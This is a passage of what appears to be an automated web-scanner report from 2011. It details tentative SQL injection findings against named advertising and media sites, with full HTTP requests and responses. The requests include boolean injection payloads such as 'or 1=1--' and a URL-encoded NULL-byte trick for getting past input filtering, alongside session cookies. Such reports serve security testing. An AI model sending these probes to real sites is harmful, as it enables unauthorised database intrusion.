rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQlvOljAoYtq6d4BMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C83ol2%2C1uo0%7Clkjpss%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh"

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3Ax4co%2Cx4cw%2Cx4cn%2C12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:57 GMT
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQn_3NjAoYv7jF4BMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 12:58:57 GMT
Set-Cookie: vsd=0@1@4dbeaa91@www.dailytelegraph.com.au; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 12:58:57 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C86eg6%2C1uo0%7Clkkk29%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:57 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 12:58:57 GMT
Content-Length: 2784

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'FFFFFF';
var AdBrite_Border_Color_Default = 'CCCCCC';
var AdBrite_URL_Color_Default = '008000';
function AdBrite_IAB_Zone_Test_Color(color) {
if (typeof(color) != 'string') return false;
if (!color.match(/^[0-9A-Fa-f]{6}$/) && !color.match(/^[0-9A-Fa-f]{3}$/)) return false;
return color;
}
var AdBrite_Title_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Title_Color);
var AdBrite_Text_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Text_Color)
...[SNIP]...

Request 2

GET /v0/ad?sid=1545288&zs=3732385f3930&ifr=1&ref=http%3A%2F%2Fwww.dailytelegraph.com.au%2Fnews%2Fbreaking-news%2Ftony-abbott-says-migration-proposals-are-weak%2Fstory-e6freuz0-1226045133021%3Ffrom%3Dpublic_rss&zx=1020&zy=22&ww=1041&wh=903&fl=1&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AXZBJEoMgEEXvwpoFQxwqtxFBJSJGQS21vXswxlTM9v33u7p7RSND9xXVap7aXjp0R3lVpWVHshFoZ0rfAAOBndaWB9AIkgAFAvRRE4LzykY1i3x5RCq4TOKu48sUSMp7EwiNTq9oL95Jmwt1RhkTiPBTCwnEgn9F%2B1c3sZ7j204lGcy%2B16nq6DozYzLb76lSd6w%2FtAQ75noK9DkX1kKIqV8%2B%2FTjJf%2FsII5FZq3r9%2FhDathc%3D"; b="%3A%3Ax4cw%2Cx4co%2Cx4cn%2C12gg8%2C12ggb%2C6e73"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQlvOljAoYtq6d4BMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C83ol2%2C1uo0%7Clkjpss%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh"

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3Ax4co%2Cx4cw%2Cx4cn%2C12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:58 GMT
Set-Cookie: vsd=0@1@4dbeaa92@www.dailytelegraph.com.au; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 12:58:58 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C86eg6%2C1uo0%7Clkkk2a%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:58 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 12:58:58 GMT
Content-Length: 2784

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'FFFFFF';
var AdBrite_Border_Color_Default = 'CCCCCC';
var AdBrite_URL_Color_Default = '008000';
function AdBrite_IAB_Zone_Test_Color(color) {
if (typeof(color) != 'string') return false;
if (!color.match(/^[0-9A-Fa-f]{6}$/) && !color.match(/^[0-9A-Fa-f]{3}$/)) return false;
return color;
}
var AdBrite_Title_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Title_Color);
var AdBrite_Text_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Text_Color);
var AdBrite_Background_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Background_Color);
var AdBrite_Border_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Border_Color);
var AdBrite_URL_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_URL_Color);
var AdBrite_Title_Color_Processed = (AdBrite_Title_Color) ? AdBrite_Title_Color : AdBrite_Title_Color_Default;
var AdBrite_Text_Color_Processed = (AdBrite_Text_Color) ? AdBrite_Text_Color : AdBrite_Text_Color_Default;
var AdBrite_Background_Color_Processed = (AdBrite_Background_Color) ? AdBrite_Background_Color : AdBrite_Background_Color_Default;
var AdBrite_Border_Color_Processed = (AdBrite_Border_Color) ? AdBrite_Border_Color : AdBrite_Border_Color_Default;
var AdBrite_URL_Color_Pr
...[SNIP]...

1.2. http://ads2.adbrite.com/v0/ad [zs parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /v0/ad?sid=1545288&zs=3732385f3930%00'&ifr=1&ref=http%3A%2F%2Fwww.perthnow.com.au%2Fnews%2Ffresh-rooftop-protest-by-asylum-seekers-despite-crackdown%2Fstory-e6frg12c-1226045349903&zx=1009&zy=17&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/news/fresh-rooftop-protest-by-asylum-seekers-despite-crackdown/story-e6frg12c-1226045349903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12gg8%2C12ggb%2C6e73"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDg1_T5CRiAk-zNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EIC7iqMKGICT7M0TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@4@4dbe1166@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 12:49:49 GMT
Content-Length: 0

Request 2

GET /v0/ad?sid=1545288&zs=3732385f3930%00''&ifr=1&ref=http%3A%2F%2Fwww.perthnow.com.au%2Fnews%2Ffresh-rooftop-protest-by-asylum-seekers-despite-crackdown%2Fstory-e6frg12c-1226045349903&zx=1009&zy=17&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/news/fresh-rooftop-protest-by-asylum-seekers-despite-crackdown/story-e6frg12c-1226045349903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12gg8%2C12ggb%2C6e73"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDg1_T5CRiAk-zNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EIC7iqMKGICT7M0TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@4@4dbe1166@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3Ax4co%2C12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:49:50 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDdxKyMChj9_6PgEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 12:49:50 GMT
Set-Cookie: ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 12:49:50 GMT
Set-Cookie: vsd=0@1@4dbea86e@www.perthnow.com.au; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 12:49:50 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C8721s%2C1uo0%7Clkkjn2%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:49:50 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 12:49:50 GMT
Content-Length: 2782

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'FFFFFF';
var AdBrite_Border_Color_Default = 'CCCCCC';
var AdBrite_URL_Col
...[SNIP]...

1.3. http://beauty.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beauty.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 11934797%20or%201%3d1--%20 and 11934797%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=111934797%20or%201%3d1--%20 HTTP/1.1
Host: beauty.glam.com
Proxy-Connection: keep-alive
Referer: http://beauty.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 06:08:41 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026480434
Expires: Mon, 02 May 2011 13:08:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:08:44 GMT
Connection: close
Set-Cookie: PHPSESSID=kihrhceouthlq0lq0eabf3cfh5; path=/
Content-Length: 20937

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' style='color:white' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();' >Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li 
class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='s
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=111934797%20or%201%3d2--%20 HTTP/1.1
Host: beauty.glam.com
Proxy-Connection: keep-alive
Referer: http://beauty.glam.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; __utmc=234602824; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Mon, 02 May 2011 13:08:44 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
X-Varnish: 1026480548
Expires: Mon, 02 May 2011 13:08:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 13:08:45 GMT
Connection: close
Set-Cookie: PHPSESSID=b47m2m334o3grlji9rltom4l26; path=/
Content-Length: 2312

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://hair.glam.com/' title='Hair'>Hair</a></li><li class=''><a href='http://makeup.glam.com/' title='Makeup'>Makeup</a></li><li class=''><a href='http://skinbody.glam.com/' title='Skin &amp; Body'>Skin &amp; Body</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><div class='_glam_search_facebook'></div></a> <a 
hre
...[SNIP]...

1.4. http://celebrities.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
